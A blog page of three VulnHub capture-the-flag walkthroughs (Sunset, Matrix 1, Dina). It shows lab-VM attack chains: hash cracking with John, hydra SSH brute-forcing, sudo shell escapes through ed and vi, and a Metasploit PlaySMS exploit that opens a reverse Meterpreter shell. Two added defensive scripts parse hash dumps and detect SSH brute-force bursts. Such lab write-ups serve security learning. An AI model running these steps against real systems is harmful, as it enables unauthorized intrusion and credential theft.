Tuesday, November 19, 2019

VulnHub: Sunset Walkthrough

We first start off with an nmap scan of the remote host.

root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.104

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-19 11:47 MST
Nmap scan report for 192.168.56.104
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.104:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
|   256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_  256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (EdDSA)
MAC Address: 08:00:27:13:81:5A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.27 seconds
root@ubuntu:~/src# 

Nmap came back with two ports open, 21 and 22. Let's connect to FTP and see what we can find there.

root@ubuntu:~# ftp 192.168.56.104
Connected to 192.168.56.104.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.104:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
226 Transfer complete.
ftp> 

We see there is one file we can download, called 'backup'. Let's download it and see what it contains. After downloading the 'backup' file we cat its contents.

root@ubuntu:~/src# cat backup
CREDENTIALS:                                                                                                                                                                                                       
office$6$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCravWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.                                                                                                                  
datacenter$6$3QWJ4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/                                                                                                              
sky$6$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                                                                                                                     
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/   
root@ubuntu:~/src# 

It looks like some usernames and password hashes. Let's fire up John the Ripper and start cracking.

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/sunset-hash.txt --format=sha512crypt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
space            (space)
cheer14          (sunset)
2g 0:00:00:13 DONE (2019-11-19 11:58) 0.1484g/s 1064p/s 1862c/s 1862C/s gerber..chanda
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#
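
John loaded only 2 of the 5 lines in the backup file, and the reason is in the file format: the office, datacenter and sky lines have no 'user:' separator and no '$' between salt and digest, so they are not valid crypt(3) '$6$' strings, while the space entry has an empty salt. The parser below is an added example, not part of the original walkthrough; it checks each line of a dump like this against the sha512crypt layout so whoever triages a leaked credential file can see which entries are well-formed before spending any cracking time. The input lines are copied from the backup file above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the five credential lines from the 'backup' file above
# (copied from the page, trailing whitespace removed).
BACKUP_LINES = [
    "office$6$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCravWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.",
    "datacenter$6$3QWJ4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/",
    "sky$6$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0",
    "sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/",
    "space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/",
]

# sha512crypt (crypt(3) "$6$") layout: $6$[rounds=N$]<salt, up to 16 chars>$<86-char digest>
# Salt and digest use the alphabet ./0-9A-Za-z. Without a rounds= field glibc
# uses 5000 iterations, which is the "Cost 1 ... is 5000" john reports above.
SHA512CRYPT_RE = re.compile(
    r"^\$6\$(?:rounds=(?P<rounds>\d+)\$)?"
    r"(?P<salt>[./0-9A-Za-z]{0,16})\$(?P<digest>[./0-9A-Za-z]{86})$"
)


@dataclass
class Entry:
    user: Optional[str]
    loadable: bool      # True if a crypt(3)-aware cracker can load the line
    rounds: int
    salt: str
    reason: str


def parse_entry(line: str) -> Entry:
    """Classify one dump line by whether it is a well-formed user:$6$ record."""
    if ":" not in line:
        return Entry(None, False, 0, "", "no 'user:hash' separator")
    user, hash_str = line.split(":", 1)
    m = SHA512CRYPT_RE.match(hash_str)
    if m is None:
        return Entry(user, False, 0, "", "hash is not a valid $6$ crypt string")
    rounds = int(m.group("rounds")) if m.group("rounds") else 5000
    salt = m.group("salt")
    # An empty salt is syntactically legal but defeats the purpose of salting:
    # identical passwords then produce identical digests.
    reason = "ok" if salt else "ok, but salt is empty"
    return Entry(user, True, rounds, salt, reason)


def triage(lines: List[str]) -> List[Entry]:
    """Parse a whole dump, skipping blank lines and bare headers like CREDENTIALS:."""
    out = []
    for raw in lines:
        line = raw.strip()
        if not line or line.endswith(":"):
            continue
        out.append(parse_entry(line))
    return out


if __name__ == "__main__":
    for e in triage(["CREDENTIALS:"] + BACKUP_LINES):
        status = "LOAD" if e.loadable else "SKIP"
        print(f"{status} user={e.user!r} rounds={e.rounds} salt={e.salt!r}: {e.reason}")
```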

We cracked two of the hashes we found. Our next step is to try to log in over SSH with the usernames and passwords we recovered.

root@ubuntu:~/src# ssh sunset@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:n9ATwmONo6fCyPblqlvcO7WcIWZJMqBaqDdo/jYnLPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
sunset@192.168.56.104's password: 
Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.182
sunset@sunset:~$ 

We got a successful login as 'sunset' with the password 'cheer14'. Let's now check the user's sudo rights.

sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
sunset@sunset:~$ 

We can run the ed editor as root with no password. We can of course break out into a shell from ed by entering the command '! /bin/bash' inside the editor.

sunset@sunset:~$ sudo /usr/bin/ed

! /bin/bash
root@sunset:/home/sunset# id
uid=0(root) gid=0(root) groups=0(root)
root@sunset:/home/sunset# whoami
root
root@sunset:/home/sunset#

We broke out into a root shell; now all that's left to do is cat the flag located in /root.

root@sunset:/home/sunset# cd /root
root@sunset:~# ls
flag.txt  ftp  server.sh
root@sunset:~# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
root@sunset:~# 

Sunday, November 17, 2019

VulnHub: Matrix 1 Walkthrough

Let's first start off with an nmap scan of the remote host.

root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.103

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-17 16:29 MST
Nmap scan report for wordy (192.168.56.103)
Host is up (0.00041s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
|   256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (EdDSA)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds
root@ubuntu:~/src# 

Nmap came back with three ports open: 22, 80 and 31337. Two of these look like web servers, so let's visit the pages and see what they have to offer.

http://192.168.56.103:
http://192.168.56.103:31337

If we view the source of the site on port 31337 we find a base64-encoded string embedded in the page.

 class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

Decoding the base64 gives:

root@ubuntu:~/src# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
root@ubuntu:~/src# 

Cypher.matrix could be a username or a file. Let's try it in the URL and see what happens.

http://192.168.56.103:31337/Cypher.matrix

+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
...

We get back a file encoded in brainfuck; our next task is to decode the text into something readable. I went to this site to decode the file: https://www.splitbrain.org/_static/ook/

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

We get another hint, this time on how to log in to the box, but first we have to generate a password list according to the hint. For that we will use the crunch wordlist utility.

root@ubuntu:~/src/crunch# ./crunch 8 8 -t k1ll0r%@ -o dict.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@ubuntu:~/src/crunch# 

Next we fire up hydra and start brute-forcing the SSH server with the user guest and the password list we just generated.

root@ubuntu:~/src/crunch# hydra -l guest -P /home/sam/src/crunch/dict.txt ssh://192.168.56.103
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-17 16:46:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103   login: guest   password: k1ll0r7n
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-17 16:47:16
root@ubuntu:~/src/crunch# 
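
From the defender's side, the hydra run above leaves a very recognisable trace in the target's auth log: a few hundred "Failed password for guest" entries from one source within seconds, followed by a single "Accepted password". The detector below is an added example, not part of the original walkthrough; it slides a time window over constructed OpenSSH-style log lines (hostnames, PIDs, ports and times are made up to match the scenario) and reports, per source and user, any failure burst and whether it ended in a successful login.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List


def _constructed_log() -> str:
    """Constructed sample of sshd syslog lines mimicking the hydra run above."""
    lines = [
        "Nov 17 16:40:00 porteus sshd[900]: Failed password for trinity from 192.168.56.102 port 40000 ssh2",
        "Nov 17 16:41:00 porteus sshd[901]: Accepted password for trinity from 192.168.56.102 port 40001 ssh2",
    ]
    # 60 failures from one source in three seconds (hydra ran 16 parallel tasks above)
    for i in range(60):
        lines.append(f"Nov 17 16:46:{55 + i // 20} porteus sshd[{1000 + i}]: "
                     f"Failed password for guest from 192.168.56.1 port {50000 + i} ssh2")
    lines.append("Nov 17 16:46:58 porteus sshd[1100]: "
                 "Accepted password for guest from 192.168.56.1 port 50100 ssh2")
    return "\n".join(lines)


SAMPLE_AUTH_LOG = _constructed_log()

# Matches both "Failed password for X" and "Failed password for invalid user X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def detect_bruteforce(log_text: str, threshold: int = 10, window_seconds: int = 60) -> List[Dict]:
    """Return one finding per (source ip, user) that reaches `threshold` failures
    inside any `window_seconds` span. Each finding counts every failure from the
    moment the burst was detected and records whether an Accepted line for the
    same ip/user followed it (a likely successful guess)."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # unrelated sshd/syslog line
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append((ts, m.group("ip"), m.group("user"), m.group("result")))
    events.sort(key=lambda e: e[0])

    recent = defaultdict(deque)   # (ip, user) -> failure timestamps inside the window
    findings: Dict[tuple, Dict] = {}
    for ts, ip, user, result in events:
        key = (ip, user)
        if result == "Failed":
            q = recent[key]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold:
                if key not in findings:
                    findings[key] = {"ip": ip, "user": user, "failures": len(q),
                                     "first": q[0], "last": ts, "success_after": False}
                else:
                    findings[key]["failures"] += 1
                    findings[key]["last"] = ts
        elif key in findings:   # Accepted after a detected burst
            findings[key]["success_after"] = True
    return list(findings.values())


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{f['ip']} -> {f['user']}: {f['failures']} failures, "
              f"success afterwards: {f['success_after']}")
```

On the host side the usual mitigations are a fail2ban-style lockout on repeated failures and sshd's MaxStartups, which is what hydra's "Many SSH configurations limit the number of parallel tasks" warning is about.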

We found the password for the user 'guest'. Now let's log in to the SSH server and get a shell.

root@ubuntu:~/src/crunch# ssh guest@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
guest@192.168.56.103's password: 
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$ 

We logged in successfully, but when we try to run commands we see that we are in a restricted bash environment.

guest@porteus:~$ pwd
/home/guest
guest@porteus:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$ 

One way to break out of the rbash shell is to run vi and, within vi, issue the :!/bin/bash command to drop into a normal bash shell.

vi
:!/bin/bash

Once we execute the vi instructions we see that we can change directories and run commands.

guest@porteus:~$ cd /home
guest@porteus:/home$ ls
guest/  trinity/
guest@porteus:/home$ 

If we check sudo rights for the user guest we get back interesting results.

guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
guest@porteus:~$ 

We can run all programs via sudo, so in order to use sudo su we first need to set up our new unrestricted shell with some shell and path variables.

guest@porteus:/home$ export SHELL=/bin/bash:$SHELL
guest@porteus:/home$ export PATH=/usr/bin:$PATH
guest@porteus:/home$ export PATH=/bin:$PATH

After setting up the shell we can run 'sudo su' to gain a root shell.

guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password: 
root@porteus:/home/guest# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@porteus:/home/guest# whoami
root
root@porteus:/home/guest# 

Now that we have root we can cd to /root and cat flag.txt.

root@porteus:/home/guest# cd /root
root@porteus:~# ls -la
total 74
drwx------ 16 root root 4096 Aug 14  2018 ./
drwxr-xr-x 51 root root 4096 Aug  6  2018 ../
-rw-------  1 root root   52 Aug 14  2018 .Xauthority
-rw-------  1 root root 6187 Nov 18 00:05 .bash_history
-rw-r--r--  1 root root   79 Mar  5  2017 .bash_profile
-rw-r--r--  1 root root 1184 Apr 22  2018 .bashrc
drwx------  5 root root 4096 Aug  6  2018 .cache/
drwxr-xr-x 21 root root 4096 Aug 13  2018 .config/
drwx------  3 root root 4096 Aug  6  2018 .dbus/
-rw-------  1 root root   16 Aug  6  2018 .esd_auth
drwx------  4 root root 4096 Aug  6  2018 .thumbnails/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Desktop/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Documents/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Downloads/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Music/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Pictures/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Public/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Videos/
-rw-r--r--  1 root root  691 Aug 14  2018 flag.txt
root@porteus:~# cat flag.txt
   _,-.                                                             
,-'  _|                  EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._              INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.           IN THE MATRIX AND BEAT OFF                 
|`-._`-.\,-'_|  _,-'.                                               
     `-.|.-' | |`.-'|_     WHAT                                     
        |      |_|,-'_`.                                            
              |-._,-'  |     NO, ME NEITHER                         
         jrei | |    _,'                                            
              '-|_,-'          IT'S JUST A HYPOTHETICAL QUESTION    

root@porteus:~# 

Saturday, November 16, 2019

VulnHub: Dina 1.0.1 Walkthrough

We first start off with an nmap scan against the remote host.

root@ubuntu:~/Downloads# nmap -sC -sV -O -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-14 19:44 MST
Nmap scan report for vtcsec (192.168.56.101)
Host is up (0.00043s latency).
Not shown: 993 closed ports
PORT      STATE    SERVICE      VERSION
80/tcp    open     http         Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
MAC Address: 08:00:27:3A:EC:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
root@ubuntu:~/Downloads# 

Nmap came back with only port 80 open, and the site's robots.txt file gives us some directories to browse.

User-agent: *
Disallow: /ange1
Disallow: /angel1
Disallow: /nothing
Disallow: /tmp
Disallow: /uploads

Most of the directories are empty, but 'nothing' contains a 404 error page. If we view the source of that page we find a hint: view-source:http://192.168.56.101/nothing/

#my secret pass
freedom
password
helloworld!
diana
iloveroot

We now have a list of passwords we can use later. Our next task is to run nikto against the host to see if it finds anything of interest.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-11-14 19:49:10 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 07:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8761 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2019-11-14 19:49:26 (GMT-7) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto came back with an interesting directory, 'secure'. If we browse to http://192.168.56.101/secure/ we find a zip file, backup.zip.

If we download the archive and try to open it we see that it is password protected. Remember that we found a list of passwords earlier; let's try those against the zip file. The password for the archive turns out to be 'freedom'. We extract the mp3 file and do a little forensics.

root@ubuntu:~/Downloads# file backup-cred.mp3 
backup-cred.mp3: ASCII text
root@ubuntu:~/Downloads# 
root@ubuntu:~/Downloads# strings backup-cred.mp3 
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin
root@ubuntu:~/Downloads# 

The mp3 file is not an mp3 at all but a text file. Running strings on it gives us a message with a username and a URL to visit: http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login

We have a login screen here, where we try the username touhid with the passwords from the list we found earlier.

username: touhid
#my secret pass
freedom
password
helloworld!
diana
iloveroot

A successful login as touhid with the password diana takes us to http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_welcome

Next we go on to search for exploits for the PlaySMS software.

root@ubuntu:~/src/exploitdb# ./searchsploit playsms
------------------------------------------------------------------------------------------------------------- -------------------------------------------
 Exploit Title                                                                                               |  Path
                                                                                                             | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)                           | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload                           | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                                             | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)                       | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                                          | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection                                                                                  | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                                               | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                                        | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                                                                      | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery                                                                 | exploits/php/webapps/30177.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb# 

We have a few choices, but I see there is a Metasploit module, which is the one we will use to get code execution and then a shell. Let's fire up Metasploit and try it out.

msf5 > search playsms

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/playsms_filename_exec   2017-05-21       excellent  Yes    PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
   1  exploit/multi/http/playsms_uploadcsv_exec  2017-05-21       excellent  Yes    PlaySMS import.php Authenticated CSV File Upload Code Execution


msf5 > use exploit/multi/http/playsms_filename_exec
msf5 exploit(multi/http/playsms_filename_exec) > show info

       Name: PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
     Module: exploit/multi/http/playsms_filename_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-05-21

Provided by:
  Touhid M.Shaikh 
  DarkS3curity

Available targets:
  Id  Name
  --  ----
  0   PlaySMS 1.4

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   admin            yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base playsms directory path
  USERNAME   admin            yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a code injection vulnerability within an 
  authenticated file upload feature in PlaySMS v1.4. This issue is 
  caused by improper file name handling in sendfromfile.php file. 
  Authenticated Users can upload a file and rename the file with a 
  malicious payload. This module was tested against PlaySMS 1.4 on 
  VulnHub's Dina 1.0 machine and Windows 7.

References:
  https://www.exploit-db.com/exploits/42003
  https://cvedetails.com/cve/CVE-2017-9080/
  https://www.youtube.com/watch?v=MuYoImvfpew
  http://touhidshaikh.com/blog/?p=336

msf5 exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
USERNAME => touhid
msf5 exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
PASSWORD => diana
msf5 exploit(multi/http/playsms_filename_exec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/playsms_filename_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin
TARGETURI => /SecreTSMSgatwayLogin
msf5 exploit(multi/http/playsms_filename_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Authentication successful : [ touhid : diana ]
[*] Sending stage (38288 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:40206) at 2019-11-16 13:19:18 -0700

meterpreter > shell
